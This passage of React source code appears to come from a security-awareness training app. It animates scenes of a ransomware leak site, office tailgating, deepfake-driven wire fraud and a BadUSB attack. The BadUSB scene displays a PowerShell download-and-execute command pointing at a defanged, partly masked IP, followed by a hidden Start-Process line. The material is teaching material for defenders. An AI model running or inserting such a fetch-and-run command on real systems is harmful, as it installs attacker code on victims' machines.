                <span className={`ls-row-status ${v.paid ? "paid" : ""}`}>{v.status}</span>
              </div>
            ))}

            <div className={`ls-row ls-row--victim ${s >= 1 ? "on" : ""}`}>
              {s >= 1 && (
                <span className="ls-row-new" aria-hidden>
                  NEW
                </span>
              )}
              <span className="ls-row-name">NorthBay Financial</span>
              <span className="ls-row-sub">2.3 TB exfiltrated &middot; finance &middot; EU</span>
              <span className={`ls-row-status ${s >= 3 ? "danger" : ""}`}>{s >= 3 ? "PAYMENT OVERDUE" : "LISTED"}</span>
            </div>
          </div>

          <div className={`ls-files ${s >= 2 ? "on" : ""}`}>
            <div className="ls-files-label">Sample files published as proof</div>
            {FILES.map((f, i) => (
              <div key={f} className={`ls-file ${s >= 2 ? "pub" : ""}`} style={{ animationDelay: `${i * 0.12}s` }}>
                <span className="ls-file-ico">{"\uD83D\uDCC4"}</span>
                <span className="ls-file-name">{f}</span>
                <span className="ls-file-tag">{s >= 3 ? "PUBLISHED" : "staged"}</span>
              </div>
            ))}
          </div>

          {s >= 3 && (
            <div className="ls-demand">
              <div className="ls-demand-row">
                <span className="ls-demand-label">Pay within 72h</span>
                <span className="ls-demand-amt">45 BTC</span>
              </div>
              <div className="ls-demand-note">…or all 2.3 TB is published in full and sold to the highest bidder.</div>
              <div className="ls-countdown">71:59:54</div>
            </div>
          )}

          {s >= 4 && (
            <div className="ls-model">
              <div className="ls-model-title">How this business actually works</div>
              <div className="ls-model-grid">
                <div className="ls-model-item">
                  <span className="ls-model-ico">{"\uD83D\uDD10"}</span>
                  <span>
                    <strong>Double extortion</strong> — encrypt AND steal, so restoring from backup alone doesn't
                    stop the leak.
                  </span>
                </div>
                <div className="ls-model-item">
                  <span className="ls-model-ico">{"\uD83E\uDD1D"}</span>
                  <span>
                    <strong>Ransomware-as-a-service</strong> — the malware's creators lease it to attack crews
                    for a cut of every ransom paid.
                  </span>
                </div>
                <div className="ls-model-item">
                  <span className="ls-model-ico">{"\uD83D\uDCC8"}</span>
                  <span>
                    <strong>Public pressure</strong> — the wall is deliberately public: customers, partners and
                    regulators can see it too.
                  </span>
                </div>
              </div>
            </div>
          )}
          </div>
        </div>
      </div>
    </div>
  );
}

/**
 * stage: 0 = pre-roll, 1 = door opens + visitor walks in, 2 = walks to the
 * board + photographs it (flash + shutter SFX), 3 = walks to the workstation
 * and plugs in the device (connect pulse + insert SFX). Timings below are
 * tuned to land the SFX right as the matching visual beat peaks; they are
 * independent of narration length (which is TTS-driven and varies), so a
 * slow line simply leaves the figure resting a bit longer in its final pose.
 */
function TailgateVisual({ stage }: { stage: number }) {
  const s = Math.min(Math.max(stage, 0), 3);
  const fired = useRef<Set<number>>(new Set());

  useEffect(() => {
    if (fired.current.has(s)) return;
    fired.current.add(s);
    let t: number | undefined;
    let t2: number | undefined;
    if (s === 1 || s === 2 || s === 3) t2 = window.setTimeout(() => audio.footsteps(3), 60);
    if (s === 2) t = window.setTimeout(() => audio.shutter(), 950);
    if (s === 3) t = window.setTimeout(() => audio.usbInsert(), 1750);
    return () => {
      if (t) window.clearTimeout(t);
      if (t2) window.clearTimeout(t2);
    };
  }, [s]);

  return (
    <div className="cqv cqv--tailgate" aria-hidden data-stage={s}>
      <svg viewBox="0 0 640 360" className="cqv-svg" preserveAspectRatio="xMidYMid slice">
        {/* floor + back wall */}
        <rect x="0" y="0" width="640" height="360" fill="#0b1013" />
        <rect x="0" y="250" width="640" height="110" fill="#11181c" />
        <line x1="0" y1="250" x2="640" y2="250" stroke="#1d282d" strokeWidth="2" />

        {/* whiteboard on the back wall: a bolted glass plaque, not a flat rect */}
        <g className="cqv-board">
          <rect x="350" y="58" width="242" height="144" rx="10" fill="#0d1417" stroke="#3a4d55" strokeWidth="1.6" />
          <rect x="350" y="58" width="242" height="144" rx="10" fill="url(#cqvBoardGlow)" />
          <g clipPath="url(#cqvBoardClip)">
            <polygon points="350,58 436,58 350,158" fill="rgba(180,230,225,0.07)" />
            <polygon points="560,58 592,58 592,150 470,202 410,202" fill="rgba(180,230,225,0.04)" />
          </g>
          <rect x="354" y="62" width="234" height="136" rx="8" fill="none" stroke="rgba(150,210,205,0.22)" strokeWidth="1" />
          {/* corner bolts, like a mounted acrylic sign */}
          <circle cx="362" cy="70" r="3.4" fill="#1c2b30" stroke="#4a666d" strokeWidth="1" />
          <circle cx="580" cy="70" r="3.4" fill="#1c2b30" stroke="#4a666d" strokeWidth="1" />
          <circle cx="362" cy="190" r="3.4" fill="#1c2b30" stroke="#4a666d" strokeWidth="1" />
          <circle cx="580" cy="190" r="3.4" fill="#1c2b30" stroke="#4a666d" strokeWidth="1" />
          <text x="372" y="100" fill="#6fe0d2" fontSize="17" fontFamily="monospace" letterSpacing="1" opacity="0.92">
            PROJECT HORIZON
          </text>
          <line x1="372" y1="110" x2="560" y2="110" stroke="rgba(111,224,210,0.5)" strokeWidth="1.6" />
          <g className="cqv-board-lines">
            <circle cx="374" cy="132" r="2.4" fill="#4aa89c" />
            <line x1="384" y1="132" x2="548" y2="132" stroke="#334750" strokeWidth="3" strokeLinecap="round" />
            <circle cx="374" cy="152" r="2.4" fill="#4aa89c" />
            <line x1="384" y1="152" x2="566" y2="152" stroke="#334750" strokeWidth="3" strokeLinecap="round" />
            <circle cx="374" cy="172" r="2.4" fill="#4aa89c" />
            <line x1="384" y1="172" x2="506" y2="172" stroke="#334750" strokeWidth="3" strokeLinecap="round" />
          </g>
        </g>

        {/* secured glass door frame (left), leaf swings open on stage>=1 */}
        <g>
          <rect x="40" y="80" width="150" height="200" rx="4" fill="#0c1216" stroke="#33454d" strokeWidth="3" />
          <g className="cqv-door" style={{ transformOrigin: "44px 180px" }}>
            <rect x="46" y="86" width="138" height="188" rx="3" fill="rgba(120,200,210,0.14)" stroke="#4aa89c" strokeWidth="2" />
            <rect x="60" y="86" width="6" height="188" fill="rgba(150,220,225,0.25)" />
            <circle cx="170" cy="184" r="4" fill="#8fd6cf" />
          </g>
        </g>

        {/* boxes the visitor left behind at the door once inside */}
        <g className="cqv-boxes" aria-hidden>
          <rect x="96" y="230" width="32" height="24" rx="2" />
          <rect x="116" y="216" width="24" height="18" rx="2" />
          <line x1="112" y1="230" x2="112" y2="254" />
          <line x1="128" y1="216" x2="128" y2="234" />
        </g>

        {/* visitor: a real rim-lit illustration (visitor.png), not a drawn stick
            figure. One consistent pose "walks" door -> board -> PC by
            re-translating the whole group per stage (below); the phone/flash
            and USB overlays are lightweight icon dramatizations layered near
            the figure rather than a re-posed body, so the art stays identical
            (and identity-consistent) at every stage. */}
        <g className="cqv-figure">
          <ellipse className="cqv-shadow" cx="0" cy="52" rx="22" ry="6" />

          <image
            className="cqv-figure-img"
            href={publicAsset("images/office-under-attack/visitor.png")}
            x="-40"
            y="-92"
            width="80"
            height="144"
            preserveAspectRatio="xMidYMax meet"
          />

          {/* stage 2: phone raised near the head, then the flash + snap */}
          <g className="cqv-phone-rig">
            <rect className="cqv-phone" x="21" y="-80" width="9" height="16" rx="2" />
            <circle className="cqv-flash" cx="25.5" cy="-72" r="32" />
          </g>

          {/* stage 3: the device held OUT TO THE SIDE, past the figure's own
              open right hand (the new visitor.png pose has both hands open
              and away from the pockets), never overlapping the torso/leg
              silhouette at all. The figure's own widest point (fingertips)
              sits at roughly x=+29.5 in this viewBox at hip height, so the
              device starts just past that edge (x>=30) and extends further
              right into empty space beside the body -- this is what removes
              any "coming out of the pants" reading: the device floats
              clearly beside an open palm, not centered over the groin. */}
          <g className="cqv-usb-hand">
            <line className="cqv-usb-arm" x1="21" y1="-34" x2="29" y2="-15" />
            <ellipse className="cqv-usb-hand-grip" cx="30" cy="-13" rx="4.6" ry="4" />
            <rect className="cqv-usb-in-hand-glow" x="29" y="-23" width="32" height="16" rx="4" />
            <rect className="cqv-usb-in-hand" x="35" y="-20" width="19" height="7.5" rx="1.3" />
            <rect className="cqv-usb-in-hand-tip" x="54" y="-18.2" width="5.5" height="4" rx="0.7" />
          </g>
        </g>

        {/* unattended workstation (right foreground) + the device once inserted */}
        <g className="cqv-pc">
          <rect x="470" y="212" width="86" height="52" rx="4" fill="#0f1519" stroke="#2b3a41" strokeWidth="2" />
          <rect x="478" y="220" width="70" height="36" rx="2" fill="#0a2a2f" />
          <rect x="500" y="264" width="26" height="8" fill="#1a252a" />
          <rect className="cqv-usb" x="454" y="234" width="20" height="9" rx="1.5" fill="#c8ccd2" />
          <circle className="cqv-usb-led2" cx="472" cy="238.5" r="1.6" />
          <circle className="cqv-port-connect" cx="466" cy="234" r="2" />
        </g>

        {/* full-scene camera-flash bloom, one shot, timed with the shutter SFX */}
        <rect className="cqv-scene-flash" x="0" y="0" width="640" height="360" fill="#eafcff" opacity="0" />

        <defs>
          <radialGradient id="cqvBoardGlow" cx="50%" cy="40%" r="70%">
            <stop offset="0%" stopColor="rgba(95,208,194,0.16)" />
            <stop offset="100%" stopColor="rgba(95,208,194,0)" />
          </radialGradient>
          <clipPath id="cqvBoardClip">
            <rect x="350" y="58" width="242" height="144" rx="10" />
          </clipPath>
        </defs>
      </svg>
    </div>
  );
}

/**
 * BadUSB dramatization: a plugged-in "flash drive" is really a programmed
 * keyboard. Stage 1 = inserted + port glows + "New keyboard detected" toast +
 * a HID-keyboard identity badge. Stage 2 = a terminal window slides in on the
 * PC's OWN monitor and the first hidden command types itself out (real
 * typing animation). Stage 3 = the payload download bar fills, the
 * beacon-installed line lands, and a radar "beaconing to attacker" ping
 * animates in the corner. A top banner makes the core lesson unmissable: NO
 * double-click, NO file opened — plugging it in is the entire attack. Wide
 * two-column layout (big device on the left, a monitor showing the live
 * consequence on the right) so the card fills the frame instead of floating
 * in empty black space.
 */
/**
 * Hacker-terminal dramatization for a paid/approved wire-fraud outcome (the
 * deepfake-CEO call). This is the ATTACKER'S OWN screen, not a security
 * camera — always paired with `cctv:false` on the beat so it renders as a
 * plain full-bleed terminal, not inside the CCTV monitor bezel.
 *
 * stage 0 = pre-roll (idle terminal, everything dim). stage 1 = the wire
 * lands in a shell account (first hop lights up + an "INCOMING WIRE" log
 * line + a data blip + a low tension bed starts). stage 2 = it's split and
 * hopped through several intermediary accounts across borders (remaining
 * hop nodes light up in sequence, each with its own log line + blip). stage
 * 3 = converted to crypto and gone (final node lights, a red "TRACE: FAILED"
 * ribbon appears, tension bed stops). Timings are independent of narration
 * length (TTS-driven), same pattern as TailgateVisual/BadUsbVisual.
 */
function HackerTerminalVisual({ stage }: { stage: number }) {
  const s = Math.min(Math.max(stage, 0), 3);
  const fired = useRef<Set<number>>(new Set());
  const termBodyRef = useRef<HTMLDivElement | null>(null);

  // World-map pin layout (percent coordinates over the MoneyFlowMap viewBox)
  // so the hop diagram reads as a real wire-fraud "money moving across the
  // globe" dramatization instead of a plain vertical list. `at` = the
  // narration stage each hop lights up; `order` chains the arcs so a later
  // hop's flight path always starts from the previously-lit node.
  const HOPS = [
    { id: "victim", label: "Finance\ndesk", x: 15, y: 62, at: 0, flag: "\uD83C\uDFE2" },
    { id: "shell", label: "Shell co.\nZurich", x: 34, y: 34, at: 1, flag: "\uD83C\uDDE8\uD83C\uDDED" },
    { id: "hop1", label: "Holding acct\nRiga", x: 50, y: 20, at: 2, flag: "\uD83C\uDDF1\uD83C\uDDFB" },
    { id: "hop2", label: "Holding acct\nDubai", x: 66, y: 52, at: 2, flag: "\uD83C\uDDE6\uD83C\uDDEA" },
    { id: "hop3", label: "Exchange\naccount", x: 82, y: 34, at: 2, flag: "\uD83C\uDDF8\uD83C\uDDEC" },
    { id: "wallet", label: "XMR wallet\nuntraceable", x: 90, y: 68, at: 3, flag: "\u2622" },
  ];
  const ARCS: Array<{ from: string; to: string; at: number }> = [
    { from: "victim", to: "shell", at: 1 },
    { from: "shell", to: "hop1", at: 2 },
    { from: "hop1", to: "hop2", at: 2 },
    { from: "hop2", to: "hop3", at: 2 },
    { from: "hop3", to: "wallet", at: 3 },
  ];

  const LOG_LINES: Array<{ at: number; text: string; bad?: boolean }> = [
    { at: 1, text: "$ incoming_wire --amount=620000EUR --ref=\"Meridian escrow\"" },
    { at: 1, text: "> credited: shell co. account (Zurich) ... OK" },
    { at: 2, text: "$ split_and_route --hops=3 --jurisdictions=LV,AE,--" },
    { at: 2, text: "> hop 1/3: Riga holding account ... cleared" },
    { at: 2, text: "> hop 2/3: Dubai holding account ... cleared" },
    { at: 2, text: "> hop 3/3: exchange account ... cleared" },
    { at: 3, text: "$ convert --to=XMR --exchange=all" },
    { at: 3, text: "> 620,000 EUR -> XMR ... complete", bad: true },
    { at: 3, text: "> trace request: FAILED — funds unrecoverable", bad: true },
  ];

  useEffect(() => {
    if (fired.current.has(s)) return;
    fired.current.add(s);
    const timers: number[] = [];
    if (s === 1) {
      audio.startExfilAlarm();
      timers.push(window.setTimeout(() => audio.dataBlip(), 120));
    }
    if (s === 2) {
      [0, 260, 520].forEach((dt) => timers.push(window.setTimeout(() => audio.dataBlip(), dt)));
      timers.push(window.setTimeout(() => audio.typing(4), 40));
    }
    if (s === 3) {
      timers.push(window.setTimeout(() => audio.dataBlip(), 80));
      timers.push(window.setTimeout(() => audio.stopExfilAlarm(), 900));
    }
    return () => {
      timers.forEach((t) => window.clearTimeout(t));
    };
  }, [s]);

  useEffect(() => {
    return () => audio.stopExfilAlarm();
  }, []);

  const visibleLog = LOG_LINES.filter((l) => l.at <= s);

  useEffect(() => {
    const el = termBodyRef.current;
    if (!el) return;
    el.scrollTop = el.scrollHeight;
  }, [visibleLog.length]);

  return (
    <div className="cqv cqv--hackerterm" aria-hidden data-stage={s}>
      <div className="ht-card">
        <div className="ht-banner">
          <span className="ht-banner-ico">{"\u26A0"}</span>
          <div className="ht-banner-text">
            <strong>The money doesn't sit still.</strong>
            <span>Once a wire like this clears, it moves fast — split, hopped across borders, and converted before anyone can react.</span>
          </div>
        </div>

        <div className="ht-grid">
          {/* LEFT: the money-flow world map — a wireframe globe grid with
              location pins that light up + connecting flight-path arcs that
              draw themselves + a traveling pulse dot, in step with the
              narration stage. Replaces the old plain vertical hop list. */}
          <div className="ht-col ht-col--hops">
            <div className="ht-map">
              <svg viewBox="0 0 100 84" className="ht-map-svg" preserveAspectRatio="xMidYMid meet" aria-hidden>
                {/* wireframe globe: latitude ellipses + a longitude curve, same
                    decorative language as the intro-card radar rings. */}
                <ellipse className="ht-globe-ring" cx="50" cy="42" rx="47" ry="38" />
                <ellipse className="ht-globe-ring" cx="50" cy="42" rx="47" ry="20" />
                <ellipse className="ht-globe-ring" cx="50" cy="42" rx="24" ry="38" />
                <line className="ht-globe-line" x1="4" y1="24" x2="96" y2="24" />
                <line className="ht-globe-line" x1="4" y1="60" x2="96" y2="60" />

                {ARCS.map((a) => {
                  const from = HOPS.find((h) => h.id === a.from)!;
                  const to = HOPS.find((h) => h.id === a.to)!;
                  const lit = a.at <= s;
                  const midX = (from.x + to.x) / 2;
                  const midY = Math.min(from.y, to.y) - 16;
                  const path = `M ${from.x} ${from.y} Q ${midX} ${midY} ${to.x} ${to.y}`;
                  return (
                    <g key={`${a.from}-${a.to}`}>
                      <path d={path} className={`ht-arc ${lit ? "lit" : ""}`} fill="none" />
                      {lit && (
                        <circle r="1.4" className="ht-arc-dot" fill="currentColor">
                          <animateMotion dur="0.9s" begin="0.05s" fill="freeze" path={path} />
                        </circle>
                      )}
                    </g>
                  );
                })}

                {HOPS.map((h) => {
                  const lit = h.at <= s;
                  return (
                    <g key={h.id} className={`ht-pin ${lit ? "lit" : ""} ${h.id === "wallet" ? "ht-pin--final" : ""}`}>
                      <circle cx={h.x} cy={h.y} r={lit ? 3.4 : 2.2} className="ht-pin-halo" />
                      <circle cx={h.x} cy={h.y} r="1.5" className="ht-pin-dot" />
                    </g>
                  );
                })}
              </svg>

              <div className="ht-map-labels">
                {HOPS.filter((h) => h.id !== "victim").map((h) => (
                  <div
                    key={h.id}
                    className={`ht-map-label ${h.at <= s ? "lit" : ""} ${h.id === "wallet" ? "ht-map-label--final" : ""}`}
                    style={{ left: `${h.x}%`, top: `${h.y}%` }}
                  >
                    <span className="ht-map-flag" aria-hidden>{h.flag}</span>
                    <span className="ht-map-text">
                      {h.label.split("\n").map((ln, j) => (
                        <span key={j}>{ln}</span>
                      ))}
                    </span>
                  </div>
                ))}
              </div>
            </div>
          </div>

          {/* RIGHT: the live terminal */}
          <div className="ht-col ht-col--term">
            <div className="ht-term">
              <div className="ht-term-bar">
                <span className="ht-dot ht-dot--r" />
                <span className="ht-dot ht-dot--y" />
                <span className="ht-dot ht-dot--g" />
                <em>ledger.sh</em>
              </div>
              <div className="ht-term-body" ref={termBodyRef}>
                {visibleLog.map((l, i) => (
                  <p key={i} className={`ht-log ${l.bad ? "ht-log--bad" : ""}`}>
                    {l.text}
                  </p>
                ))}
                {visibleLog.length > 0 && <span className="ht-caret" />}
              </div>
            </div>
            {s >= 3 && (
              <div className="ht-trace">
                <span className="ht-trace-dot" /> TRACE: FAILED — funds unrecoverable
              </div>
            )}
          </div>
        </div>
      </div>
    </div>
  );
}

function BadUsbVisual({ stage }: { stage: number }) {
  const s = Math.min(Math.max(stage, 0), 3);
  return (
    <div className="cqv cqv--badusb" data-stage={s} aria-hidden>
      <div className="bu-card">
        <div className="bu-glow" />

        <div className="bu-attacktitle">
          <span className="bu-attacktitle-ico">{"\u232B"}</span>
          <span className="bu-attacktitle-text">A BadUSB Attack</span>
        </div>

        <div className="bu-banner">
          <span className="bu-banner-ico">{"\u26A0"}</span>
          <div className="bu-banner-text">
            <strong>No double-click needed.</strong>
            <span>The instant it's plugged in, it acts like a keyboard and types on its own — no file, no click, no warning.</span>
          </div>
        </div>

        <div className="bu-grid">
          {/* LEFT: the "USB drive" being inserted, revealed as a keyboard */}
          <div className="bu-col bu-col--device">
            <div className="bu-portrow">
              <div className="bu-portblock">
                <div className="bu-port">
                  <span className="bu-port-ring" />
                </div>
                <div className="bu-usb">
                  <span className="bu-usb-body">
                    <span className="bu-usb-led" />
                  </span>
                  <span className="bu-usb-tip" />
                </div>
              </div>
            </div>
            <div className="bu-idbadge">
              <span className="bu-idbadge-ico">⌨</span>
              <span className="bu-idbadge-text">
                <strong>The PC thinks it's a keyboard</strong>
                <em>not a USB drive — nothing needs to be opened</em>
              </span>
            </div>
            <div className="bu-toast">
              <span className="bu-toast-dot" /> New keyboard detected — ready to use
            </div>
            {/* Connects the device column to the "what happens on the PC" column —
                without this the two halves read as unrelated widgets rather than
                one cause-and-effect: plug in device -> this happens on screen. */}
            <div className="bu-linkline" aria-hidden>
              <span className="bu-linkline-arrow">{"\u2192"}</span>
              <span className="bu-linkline-text">Everything on the right happens automatically, in seconds</span>
            </div>
          </div>

          {/* RIGHT: what the PC's own screen shows, live */}
          <div className="bu-col bu-col--screen">
            <div className="bu-screen-label">What's happening on this computer right now</div>
            <div className="bu-monitor">
              <span className="bu-monitor-cam" aria-hidden />
              <div className="bu-screen">
                <div className="bu-term">
                  <div className="bu-term-bar">
                    <span className="bu-dot bu-dot--r" />
                    <span className="bu-dot bu-dot--y" />
                    <span className="bu-dot bu-dot--g" />
                    <em>powershell.exe</em>
                  </div>
                  <div className="bu-term-body">
                    <p className="bu-line bu-l1">
                      <span className="bu-prompt">PS&gt;</span>
                      <span className="bu-typed">
                        IEX (New-Object Net.WebClient).DownloadString(&apos;hxxp://45.9.x.x/p&apos;)
                      </span>
                      <span className="bu-caret" />
                    </p>
                    <p className="bu-line bu-l2">
                      <span className="bu-prompt">PS&gt;</span> Start-Process $payload -WindowStyle Hidden
                    </p>
                    <div className="bu-dl">
                      <span className="bu-dl-label">downloading a hidden program…</span>
                      <span className="bu-dl-track">
                        <span className="bu-dl-fill" />
                      </span>
                    </div>
                    <p className="bu-line bu-l3 bu-bad">
                      <span className="bu-bad-dot" /> installed — quietly sending data to the attacker
                    </p>
                  </div>
                </div>

                {/* beaconing-out radar ping, only once the implant is "installed" */}
                <div className="bu-beacon" aria-hidden>
                  <span className="bu-beacon-ring" />
                  <span className="bu-beacon-ring bu-beacon-ring--2" />
                  <span className="bu-beacon-core" />
                </div>
              </div>
              <span className="bu-monitor-stand" aria-hidden />
            </div>
            <div className="bu-plainlang">
              In plain terms: a hidden program is now controlling this computer and sending
              information to the attacker — all without anyone touching a file.
            </div>
          </div>
        </div>
      </div>
    </div>
  );
}
